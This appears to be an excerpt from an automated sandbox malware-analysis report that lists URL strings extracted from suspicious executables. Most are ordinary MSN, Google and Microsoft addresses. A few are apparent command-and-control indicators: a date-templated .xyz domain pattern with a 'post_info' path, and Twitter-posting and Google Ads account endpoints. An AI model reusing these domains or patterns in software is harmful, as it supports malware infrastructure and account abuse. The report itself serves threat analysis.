Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: MiniThunderPlatform.exe.3.drString found in binary or memory: http://store.paycenter.uc.cn
Source: MiniThunderPlatform.exe.3.drString found in binary or memory: http://store.paycenter.uc.cnmail-attachment.googleusercontent.com
Source: MiniThunderPlatform.exe.3.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: MiniThunderPlatform.exe.3.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: MiniThunderPlatform.exe.3.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284560331.0000000003FB5000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: fnhcdXEfus.exeString found in binary or memory: http://www.installshield.com/isetup/ProErrorCentral.asp?ErrorCode=%d
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275181666.00000000033EF000.00000004.00000001.sdmpString found in binary or memory: http://www.interestvideo.com/video1.php
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chromeH
Source: ecvB803.tmp.11.drString found in binary or memory: http://www.msn.com
Source: ecvB803.tmp.11.drString found in binary or memory: http://www.msn.com/
Source: ecvB803.tmp.11.drString found in binary or memory: http://www.msn.com/?ocid=iehp
Source: ecvB803.tmp.11.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: ecvB803.tmp.11.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: ecvB803.tmp.11.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: 1612045890161.exe, 0000000B.00000002.267608441.0000000000198000.00000004.00000010.sdmpString found in binary or memory: http://www.nirsoft.net
Source: 1612045890161.exe, 1612045890161.exe.3.drString found in binary or memory: http://www.nirsoft.net/
Source: download_engine.dll.3.drString found in binary or memory: http://www.openssl.org/support/faq.html
Source: download_engine.dll.3.drString found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: download_engine.dll.3.drString found in binary or memory: http://www.xunlei.com/
Source: download_engine.dll.3.drString found in binary or memory: http://www.xunlei.com/GET
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: http://www.youtube.com
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364204277.0000000003947000.00000004.00000040.sdmpString found in binary or memory: https://1A469593C1FE15DC.xyz/
Source: ecvB803.tmp.11.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
Source: ecvB803.tmp.11.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
Source: ecvB803.tmp.11.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/selectaccount
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: ecvB803.tmp.11.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
Source: ecvB803.tmp.11.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
Source: ecvB803.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: ecvB803.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: ecvB803.tmp.11.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
Source: ecvB803.tmp.11.drString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: ecvB803.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.272953310.0000000003F20000.00000004.00000001.sdmpString found in binary or memory: https://chrome.google.com/webstore
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262358727.0000000003FAB000.00000004.00000001.sdmp, background.js.4.drString found in binary or memory: https://chrome.google.com/webstore/category/extension
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.272918469.000000000309C000.00000004.00000040.sdmpString found in binary or memory: https://chrome.google.com/webstoreAA
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://clients2.google.com/service/update2/cr
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.272953310.0000000003F20000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx5
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx=
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxM
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://content.googleapis.com
Source: ecvB803.tmp.11.drString found in binary or memory: https://contextual.media.net/
Source: ecvB803.tmp.11.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: ecvB803.tmp.11.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ecvB803.tmp.11.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ecvB803.tmp.11.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368731244.00000000034EF000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275181666.00000000033EF000.00000004.00000001.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ecvB803.tmp.11.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: ecvB803.tmp.11.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: ecvB803.tmp.11.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262688251.0000000003F57000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262688251.0000000003F57000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_appk/B
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://drive.google.com/drive/settings
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/drive/settingsawl7
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://feedback.googleusercontent.com
Source: ecvB803.tmp.11.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com;
Source: ecvB803.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: ecvB803.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: ecvB803.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: ecvB803.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
Source: ecvB803.tmp.11.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: ecvB803.tmp.11.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://hangouts.google.com/
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: ecvB803.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: ecvB803.tmp.11.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: ecvB803.tmp.11.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: ecvB803.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ecvB803.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ecvB803.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ecvB803.tmp.11.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: ecvB803.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
Source: ecvB803.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
Source: ecvB803.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
Source: ecvB803.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
Source: ecvB803.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail/#settings
Source: ecvB803.tmp.11.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: ecvB803.tmp.11.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: ecvB803.tmp.11.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-22-21-45-19/PreSignInSettingsConfig.json
Source: ecvB803.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
Source: ecvB803.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
Source: ecvB803.tmp.11.drString found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://payments.google.com/
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jstW2
Source: ecvB803.tmp.11.drString found in binary or memory: https://pki.goog/repository/0
Source: ecvB803.tmp.11.drString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: ecvB803.tmp.11.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://sandbox.google.com/
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsuSS4
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ecvB803.tmp.11.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
Source: ecvB803.tmp.11.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284617866.0000000003F9F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284617866.0000000003F9F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/ookie:
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comReferer:
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
